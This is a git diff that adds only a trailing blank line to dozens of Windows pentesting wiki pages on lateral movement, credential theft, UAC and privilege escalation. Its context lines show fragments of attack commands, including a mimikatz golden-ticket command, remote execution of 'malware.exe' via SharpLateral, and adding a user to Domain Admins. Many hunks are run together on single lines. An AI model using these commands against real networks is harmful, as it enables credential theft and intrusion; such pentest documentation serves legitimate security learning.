diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md b/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
index aee779118..d7f1ce6fa 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
@@ -204,3 +204,4 @@ Consists on watching if an **autoElevated binary** tries to **read** from the **
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/av-bypass.md b/src/windows-hardening/av-bypass.md
index e22accaa7..5908cc513 100644
--- a/src/windows-hardening/av-bypass.md
+++ b/src/windows-hardening/av-bypass.md
@@ -570,3 +570,4 @@ https://github.com/praetorian-code/vulcan
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/basic-cmd-for-pentesters.md b/src/windows-hardening/basic-cmd-for-pentesters.md
index b833daece..03848080b 100644
--- a/src/windows-hardening/basic-cmd-for-pentesters.md
+++ b/src/windows-hardening/basic-cmd-for-pentesters.md
@@ -467,3 +467,4 @@ powershell -ep bypass - < c:\temp:ttt
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/basic-powershell-for-pentesters/README.md b/src/windows-hardening/basic-powershell-for-pentesters/README.md
index 8d1a4f791..46272c13d 100644
--- a/src/windows-hardening/basic-powershell-for-pentesters/README.md
+++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md
@@ -467,3 +467,4 @@ RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/basic-powershell-for-pentesters/powerview.md b/src/windows-hardening/basic-powershell-for-pentesters/powerview.md
index bdb23e473..2bae4437e 100644
--- a/src/windows-hardening/basic-powershell-for-pentesters/powerview.md
+++ b/src/windows-hardening/basic-powershell-for-pentesters/powerview.md
@@ -337,3 +337,4 @@ Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/checklist-windows-privilege-escalation.md b/src/windows-hardening/checklist-windows-privilege-escalation.md
index 3d897fcc4..960560333 100644
--- a/src/windows-hardening/checklist-windows-privilege-escalation.md
+++ b/src/windows-hardening/checklist-windows-privilege-escalation.md
@@ -114,3 +114,4 @@
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/cobalt-strike.md b/src/windows-hardening/cobalt-strike.md
index 6cf274944..2ad645c24 100644
--- a/src/windows-hardening/cobalt-strike.md
+++ b/src/windows-hardening/cobalt-strike.md
@@ -236,3 +236,4 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
+
diff --git a/src/windows-hardening/lateral-movement/README.md b/src/windows-hardening/lateral-movement/README.md
index 8c702979d..f43129809 100644
--- a/src/windows-hardening/lateral-movement/README.md
+++ b/src/windows-hardening/lateral-movement/README.md
@@ -17,3 +17,4 @@ There are different different ways to execute commands in external systems, here
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/lateral-movement/atexec.md b/src/windows-hardening/lateral-movement/atexec.md
index a04950330..e72baf864 100644
--- a/src/windows-hardening/lateral-movement/atexec.md
+++ b/src/windows-hardening/lateral-movement/atexec.md
@@ -33,3 +33,4 @@ More information about the [**use of schtasks with silver tickets here**](../act
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/lateral-movement/dcom-exec.md b/src/windows-hardening/lateral-movement/dcom-exec.md
index 2f0e646d1..2d8634803 100644
--- a/src/windows-hardening/lateral-movement/dcom-exec.md
+++ b/src/windows-hardening/lateral-movement/dcom-exec.md
@@ -119,3 +119,4 @@ SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/lateral-movement/psexec-and-winexec.md b/src/windows-hardening/lateral-movement/psexec-and-winexec.md
index 927127441..68b6b35af 100644
--- a/src/windows-hardening/lateral-movement/psexec-and-winexec.md
+++ b/src/windows-hardening/lateral-movement/psexec-and-winexec.md
@@ -38,3 +38,4 @@ SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/lateral-movement/smbexec.md b/src/windows-hardening/lateral-movement/smbexec.md
index 1d6dc29b1..02f08dc46 100644
--- a/src/windows-hardening/lateral-movement/smbexec.md
+++ b/src/windows-hardening/lateral-movement/smbexec.md
@@ -42,3 +42,4 @@ FOr further details check [https://blog.ropnop.com/using-credentials-to-own-wind
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/lateral-movement/winrm.md b/src/windows-hardening/lateral-movement/winrm.md
index 913866940..0ccd9da50 100644
--- a/src/windows-hardening/lateral-movement/winrm.md
+++ b/src/windows-hardening/lateral-movement/winrm.md
@@ -7,3 +7,4 @@ For information about [**WinRM read this page**](../../network-services-pentesti
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/lateral-movement/wmiexec.md b/src/windows-hardening/lateral-movement/wmiexec.md
index 8a6438453..f2ad2bc88 100644
--- a/src/windows-hardening/lateral-movement/wmiexec.md
+++ b/src/windows-hardening/lateral-movement/wmiexec.md
@@ -130,3 +130,4 @@ SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/ntlm/README.md b/src/windows-hardening/ntlm/README.md
index c35b4d26f..636a296ec 100644
--- a/src/windows-hardening/ntlm/README.md
+++ b/src/windows-hardening/ntlm/README.md
@@ -287,3 +287,4 @@ wce.exe -s :::
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/ntlm/atexec.md b/src/windows-hardening/ntlm/atexec.md
index a04950330..e72baf864 100644
--- a/src/windows-hardening/ntlm/atexec.md
+++ b/src/windows-hardening/ntlm/atexec.md
@@ -33,3 +33,4 @@ More information about the [**use of schtasks with silver tickets here**](../act {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md b/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
index c9c9db24b..ba8af657f 100644
--- a/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
+++ b/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
@@ -7,3 +7,4 @@ {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/ntlm/psexec-and-winexec.md b/src/windows-hardening/ntlm/psexec-and-winexec.md
index 9909bcf29..a52930b0d 100644
--- a/src/windows-hardening/ntlm/psexec-and-winexec.md
+++ b/src/windows-hardening/ntlm/psexec-and-winexec.md
@@ -40,3 +40,4 @@ SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/ntlm/smbexec.md b/src/windows-hardening/ntlm/smbexec.md
index 5615536c2..f0682e08e 100644
--- a/src/windows-hardening/ntlm/smbexec.md
+++ b/src/windows-hardening/ntlm/smbexec.md
@@ -40,3 +40,4 @@ FOr further details check [https://blog.ropnop.com/using-credentials-to-own-wind {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/ntlm/winrm.md b/src/windows-hardening/ntlm/winrm.md
index 913866940..0ccd9da50 100644
--- a/src/windows-hardening/ntlm/winrm.md
+++ b/src/windows-hardening/ntlm/winrm.md
@@ -7,3 +7,4 @@ For information about [**WinRM read this page**](../../network-services-pentesti {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/ntlm/wmiexec.md b/src/windows-hardening/ntlm/wmiexec.md
index 8a6438453..f2ad2bc88 100644
--- a/src/windows-hardening/ntlm/wmiexec.md
+++ b/src/windows-hardening/ntlm/wmiexec.md
@@ -130,3 +130,4 @@ SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/stealing-credentials/README.md b/src/windows-hardening/stealing-credentials/README.md
index 799148b43..20a326530 100644
--- a/src/windows-hardening/stealing-credentials/README.md
+++ b/src/windows-hardening/stealing-credentials/README.md
@@ -324,3 +324,4 @@ Download it from:[ http://www.tarasco.org/security/pwdump_7](http://www.tarasco. {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/stealing-credentials/credentials-mimikatz.md b/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
index f903a894d..b4de2f109 100644
--- a/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
+++ b/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
@@ -212,3 +212,4 @@ mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123 {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/stealing-credentials/credentials-protections.md b/src/windows-hardening/stealing-credentials/credentials-protections.md
index 974bfa98c..ac2fc2bfd 100644
--- a/src/windows-hardening/stealing-credentials/credentials-protections.md
+++ b/src/windows-hardening/stealing-credentials/credentials-protections.md
@@ -118,3 +118,4 @@ For more detailed information, consult the official [documentation](https://docs {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/stealing-credentials/wts-impersonator.md b/src/windows-hardening/stealing-credentials/wts-impersonator.md
index 05cb163a8..06388e3cf 100644
--- a/src/windows-hardening/stealing-credentials/wts-impersonator.md
+++ b/src/windows-hardening/stealing-credentials/wts-impersonator.md
@@ -50,3 +50,4 @@ WTSEnumerateSessionsA β†’ WTSQuerySessionInformationA β†’ WTSQueryUserToken β†’ {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md
index 27aef6bcd..27d45f03f 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/README.md
@@ -1620,3 +1620,4 @@ C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md b/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
index dc9726a3a..2138fb1ca 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
@@ -110,3 +110,4 @@ Learn more about tokens in this tutorials: [https://medium.com/@seemant.bisht24/ {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md b/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
index ace594ff7..36f8f26d5 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
@@ -153,3 +153,4 @@ In summary, ACLs and ACEs help define precise access controls, ensuring that onl +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
index 7a32103ba..06a9bfe5c 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
@@ -28,3 +28,4 @@ Although the vulnerability was initially disclosed unintentionally through the s {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
index f811cb30c..ffee84a91 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
@@ -81,3 +81,4 @@ Then, you can just create the HKCU entry and everytime the user logs in, your ba {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
index b39cf8cec..4ec95c602 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
@@ -69,3 +69,4 @@ Please note that while this summary aims to provide valuable information, it is {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
index aa862eec5..518fc15f2 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
@@ -239,3 +239,4 @@ BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReser {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
index 5b13574b1..ef0727d8c 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
@@ -237,3 +237,4 @@ BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReser {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
index d38fe12d2..1b68a4bc6 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
@@ -84,3 +84,4 @@ When the service is re-started, the **dll should be loaded and executed** (you c {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
index e1d574a78..0c6744fc3 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
@@ -106,3 +106,4 @@ With extracted from LDAP computers list you can find every sub network even if y {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md b/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
index f30d6f078..4d966072f 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
@@ -120,3 +120,4 @@ int main() { {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
index 02acd7339..7210ba8fb 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
@@ -99,3 +99,4 @@ Due to the restrictions commented in this and the previous section, from a secur {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
index f9d906f10..1cd154432 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
@@ -133,3 +133,4 @@ Then download [test_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md b/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
index 7ab7b43e2..b5c742918 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
@@ -693,3 +693,4 @@ Another tool to leak a handle and exploit it. {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md b/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
index e1ac9e375..fd0ef26ee 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
@@ -22,3 +22,4 @@ From here just click on **next buttons** and the last **build button and your in {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md b/src/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md
index 15a5056c9..5639ff674 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md
@@ -9,3 +9,4 @@ Check: [**https://ired.team/offensive-security/privilege-escalation/windows-name {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
index fb3d99c4c..4c2bb5e4a 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
@@ -184,3 +184,4 @@ Full token privileges cheatsheet at [https://github.com/gtworek/Priv2Admin](http {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md
index 9a7fb9a7b..b274b010c 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md
@@ -193,3 +193,4 @@ Full token privileges cheatsheet at [https://github.com/gtworek/Priv2Admin](http {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
index 19e14a00c..3fa8b6a7d 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
@@ -343,3 +343,4 @@ autorunsc.exe -m -nobanner -a * -ct /accepteula {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
index d1f90b41b..627f1f790 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
@@ -96,3 +96,4 @@ nt authority\system {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md b/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
index 62b71b264..9ce74e175 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
@@ -215,3 +215,4 @@ int _tmain( int argc, TCHAR* argv[] ) {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md b/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
index 83386f092..43e829a35 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
@@ -180,3 +180,4 @@ Inside that process "Administrators" can "Read Memory" and "Read Permissions" wh {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md b/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
index 2ed58453d..ca976e406 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
@@ -18,3 +18,4 @@ int main () {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/windows-hardening/windows-security-controls/uac-user-account-control.md b/src/windows-hardening/windows-security-controls/uac-user-account-control.md
index 70b240a60..5739c7887 100644
--- a/src/windows-hardening/windows-security-controls/uac-user-account-control.md
+++ b/src/windows-hardening/windows-security-controls/uac-user-account-control.md
@@ -204,3 +204,4 @@ Consists on watching if an **autoElevated binary** tries to **read** from the ** {{#include ../../banners/hacktricks-training.md}} +